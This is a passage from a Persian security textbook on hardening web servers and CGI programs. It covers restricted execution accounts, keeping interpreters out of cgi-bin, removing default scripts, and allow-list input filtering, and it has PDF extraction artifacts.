‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﻭ ﻳﺎ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻭ ﺗﻜﻨﻴﻚ ﻣﻲﺗﻮﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺏ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩ‪:‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﻮﻧﺪ ﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﺑﺠﺰ ﺍﻋﻤـﺎﻝ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﻛـﺎﺭ‬ ‫•‬
‫ﺩﻳﮕﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ؛‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬ ‫•‬
‫ﺑﮕﻴﺮﻧﺪ ﺗﺎ ﻳﻚ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ‪ ،‬ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﻣﺘﻔـﺎﻭﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺘﻔـﺎﻭﺕ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ‪،‬‬
‫ﻻ ﺗﺤﺖ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳﻨـﺪ‪ ،‬ﻣﺜـﻞ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ‪ nobody‬ﻭ ﻳـﺎ‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ‬
‫‪ .httpd‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ‪ CGI‬ﻭ ‪ API‬ﻛـﻪ ﺑـﻪ ﻗـﺼﺪ ﺍﻳﺠـﺎﺩ ﺍﺧـﻼﻝ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣـﻮﺭﺩ‬
‫‪٢١٨‬‬
‫ﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺁﻣﺪ‪.‬‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺗﺤﺖ ﻫﻤﺎﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮ ﹺ‬
‫ﻱ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺍﻳﺠﺎﺩ ﻧﻜﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﻧﮕﺎﺭﺷـﻬﺎﻱ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮ ﹺ‬
‫‪ ،98 ،95 ،3.1‬ﻭ ‪ ME‬ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows‬ﻭ ﻧﻴﺰ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Mac OS 7-9‬ﻛﻪ ﭘﻴﺶ ﺍﺯ ‪ Mac OS X‬ﻛـﺎﺭﺑﺮﺩ ﺩﺍﺷـﺖ‪،‬‬
‫ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﺪ‪.‬‬

‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺑﻪ ‪ CGI‬ﻧﻮﺷﺘﻪ ﺷﻮﻧﺪ‬


‫ﻣﻔﺴﺮﻫﺎ‪ ،‬ﭘﻮﺳﺘﻪﻫﺎ‪ ،‬ﻣﻮﺗﻮﺭﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺗﻮﺳﻌﻪ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺩﺭ ﻳﻚ ﺷﺎﺧﺔ ﻣﺘﻌﻠـﻖ ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ‪CGI‬‬
‫ﺏ ﻳـﻚ ﺭﺍﻳﺎﻧـﺔ ﻣﻴﺰﺑـﺎﻥ‬
‫)ﻣﺜﻞ ‪ (cgi-bin‬ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺍﺯ ﺁﻥ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﺍﺣﺘﻤﺎﻝ ﺭﺳﻴﺪﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﺑﻪ ﭘﺮﺩﺍﺯﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭ ﹺ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﺶﮔﻔﺘﻪ ﺑﻄﻮﺭ ﻛﻠﻲ ﻧﺒﺎﻳـﺪ ﺩﺭ ﻫـﻴﭻ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ ﺁﻥ ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﻨﺪ؛ ﻭ ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻫﺮ ﺑﺮﻧﺎﻣﺔ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻧﺪ‪.‬‬

‫‪216 Embedded Scripting Language‬‬


‫‪217 Embedded Web-server‬‬
‫ﻼ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﺭ ﻳﻚ ‪ ISP‬ﻳﺎ ﻳﻚ ﺩﺍﻧﺸﮕﺎﻩ‪ ،‬ﻣﻌﻤﻮﻝ ﺍﺳﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ ﻛﻪ ﺑﺠـﺎﻱ‬
‫‪ ۲۱۸‬ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﭼﻨﺪﻛﺎﺭﺑﺮﻱ‪ ،‬ﻣﺜ ﹰ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ‪ ،‬ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺧﻮﺩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ‪.‬‬
‫‪٣٦١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻱ ﺧﻮﺩ ﻛﺎﺭ ﺳﺎﺩﻩﺍﻱ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﭼﻴـﺰﻱ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﺭﺍ‬ ‫ﻛﺴﺐ ﺁﮔﺎﻫﻲ ﺩﺭ ﻣﻮﺭﺩ ﺻﺤﻴﺢ ﻳﺎ ﻧﺎﺻﺤﻴﺢ ﺑﻮﺩﻥ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺧﻮﺩ ﹺ‬
‫ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺟﺴﺘﺠﻮﮔﺮﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ‪ ،‬ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺁﺳـﻴﺐﭘـﺬﻳﺮ ﺭﺍ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ ،Windows‬ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ‪ (PERL.EXE) perl‬ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺩﺭ ﺷﺎﺧﺔ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪CGI‬‬
‫ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻫﺎﻱ ﻭﺏ ﺗﺤﺖ ‪ Windows‬ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺗﻨﻬﺎ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ‬
‫ﻛﻪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﺟﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ perl‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳﺎﺩﻩﺗﺮ ﺷﻮﺩ‪.‬‬
‫ﻳﻚ ﻋﺎﻣﻞ ﺩﻳﮕﺮ ﻧﮕﺮﺍﻧﻲ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ ﻣﻨﺘـﺸﺮ ﺷـﺪﻩﺍﻧـﺪ ﻭ‬
‫ﺑﻌﺪﻫﺎ ﺩﺭ ﺁﻧﻬﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﺷﻜﺎﺭ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ‪ ،‬ﺑﻨـﺪﺭﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ‬
‫ﺽ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ )ﺯﻳﺮﺍ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﻓﻬﻤﻴﺪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺶﻓﺮ ﹺ‬
‫ﻳﺎ ﺧﻴﺮ(‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻄﺮﻧﺎﻙ ﺗﺎ ﻣﺎﻫﻬﺎ ﻭ ﻳﺎ ﺣﺘﻲ ﺳﺎﻟﻬﺎ ﺑﺮ ﺟﺎﻱ ﺧﻮﺩ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪ ،‬ﺣﺘﻲ ﺍﮔـﺮ ﺁﻥ ﻧﻘـﺺ‬
‫ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﺮﺗﻔﻊ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲﺷـﺎﻥ ﺑﻌـﺪ ﺍﺯ ﻣـﺪﺗﻲ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ ﺍﺯ‬
‫ﺧﻮﺩﺗﺎﻥ ﻣﺤﻔﺎﻇﺖ ﻛﻨﻴﺪ‪ ،‬ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻴﺶﻓﺮﺽ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﻳﻚ ﺷﺎﺧﺔ ﺟﺪﻳﺪ ﻣﻨﺘﻘﻞ‬
‫ﻛﻨﻴﺪ ﺗﺎ ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﻭ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺷﺎﺧﻪﻫﺎﻱ ﻛﺎﺭﻱ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ‬


‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻟﻬﺎ ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﺑﺼﻮﺭﺕ ﻧﺎﺩﺍﻧﺴﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺨﻔﻲ‪ ،‬ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻧﻮﺷﺘﻪ ﻭ ﺍﺯ ﺭﻭﻱ ﻋﻤﺪ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺑﺎﺷـﺪ‬
‫‪ -‬ﻣﺜﻞ ﻧﻮﻋﻲ ﺩﺭﺏ ﻣﺨﻔﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺣﻔـﺮﻩﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻧﺎﺷﻲ ﺍﺯ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﻧﺎﺧﻮﺍﺳﺘﺔ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺑﻪ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻛﻪ ﺍﺯ ﺧﺎﺭﺝ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺏ ﻭﺍﺭﺩ ﻓﺮﻣﻬﺎﻱ ﻭﺏ‪ ،‬ﻣﺘﻐﻴﺮﻫـﺎﻱ ﻣﺤﻴﻄـﻲ‪cookie ،‬ﻫـﺎﻱ‬
‫ﻻ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﻧﺎﺧﻮﺍﺳﺘﺔ ﻗﻄﻌﻪﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﻛـﺮﺩ‪ .‬ﻫـﺮ ﻭﺭﻭﺩﻱ ﺍﺯ‬
‫ﻓﺮﻣﻬﺎ‪ ،‬ﻳﺎ ﻫﺮﺟﺎﻱ ﺩﻳﮕﺮ ﻣﻲﺷﻮﻧﺪ ﺗﻜﻴﻪ ﻧﻜﻨﻴﻢ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﻛﻪ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺻﺤﻴﺢ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﻭ ﻧﻴﺰ ﺑﺎﻣﻌﻨﺎ ﺍﺳﺖ‪.‬‬
‫ﺑﺎﻳﺪ ﺻﺎﻓﻲﻫﺎﻳﻲ ﻃﺮﺍﺣﻲ ﺷﻮﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺭﺍ ﺗـﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻭ ﺑﭙﺬﻳﺮﻧـﺪ ﻭ ﻣـﺎﺑﻘﻲ ﺭﺍ ﺭﺩ ﻛﻨﻨـﺪ‪ ،‬ﻧـﻪ ﺍﻳﻨﻜـﻪ ﻳـﻚ‬
‫ﻓﻬﺮﺳﺖ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻏﻴﺮﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺑﺮﺍﻱ ﻧﭙﺬﻳﺮﻓﺘﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﻫﻤﺔ ﻭﺭﻭﺩﻳﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺑﺮﺍﻱ ﭘﺬﻳﺮﻓﺘﻦ ﺗﺄﻳﻴـﺪ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺭﻭﺵ ﺍﻭﻝ‬
‫ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦﺗﺮ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﻫﻤﺔ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻧﺎﺻﺤﻴﺢ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ؛ ﺧﺼﻮﺻﹰﺎ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﻛﻪ ﺑﺮﺧﻲ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﻛﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﻣﺮﻭﺯﻩ ﻧﺎﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻧﺎﺻﺤﻴﺢ ﻣﺤﺴﻮﺏ ﺷﻮﻧﺪ! ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻗـﺪﻳﻤﻲ‪،‬‬
‫ﻭﺟﻮﺩ ﻋﻼﺋﻢ ‪ Unicode‬ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻛﺎﺭﺑﺮﺩ ﻓﺮﺍﻭﺍﻧﻲ ﻳﺎﻓﺘﻪﺍﻧﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺑﻮﺩ‪.‬‬
‫ﺑــﺮﺍﻱ ﻣــﺸﺎﻫﺪﺓ ﻣﺜﺎﻟﻬــﺎﻱ ﺑﻴــﺸﺘﺮ ﺍﺯ ﺁﺛــﺎﺭ ﺟــﺎﻧﺒﻲ ﻧﺎﺧﻮﺍﺳــﺘﻪ‪ ،‬ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺭﺟــﻮﻉ ﻛﻨﻴــﺪ ﺑــﻪ ﻓــﺼﻞ ﺷــﺎﻧﺰﺩﻫﻢ ﺍﺯ ﻭﻳــﺮﺍﻳﺶ ﺩﻭﻡ ﻛﺘــﺎﺏ‬
‫"‪ "Web Security, Privacy, and Commerce‬ﻧﻮﺷﺘﺔ ﮔﺎﺭﻓﻴﻨﻜﻞ‪.٢١٩‬‬

‫ﺍﺻﻮﻝ ﻋﻤﻮﻣﻲ ﺩﺭ ﻧﮕﺎﺭﺵ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﺳﺘﻪﻫﺎﻱ ﺍﻳﻤﻦ‬


‫ﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﻧﮕﺎﺭﺵ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﺳﺘﻪ ﺭﺍ ﺑﻴﺎﻥ ﻣﻲﻛﻨﻨﺪ‪:‬‬
‫ﺍﺻﻮﻝ ﺯﻳﺮ‪ ،‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪ ﹺ‬
‫ﭘﻴﺶ ﺍﺯ ﺷﺮﻭﻉ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ‪ ،‬ﺍﺑﺘﺪﺍ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻃﺮﺍﺣﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﻤﺔ ﺯﻭﺍﻳﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﻨﻮﻳـﺴﻴﺪ‬ ‫‪.١‬‬
‫ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﻓﻬﻤﻴﺪﻩﺍﻳﺪ‪ .‬ﺑﺴﺘﺮﻱ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﺷﻮﺩ‪ ،‬ﺭﻓﺘﺎﺭ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻗﺒﺎﻝ ﻭﺭﻭﺩﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﺭﺩ‬

‫‪219 Garfinkel‬‬
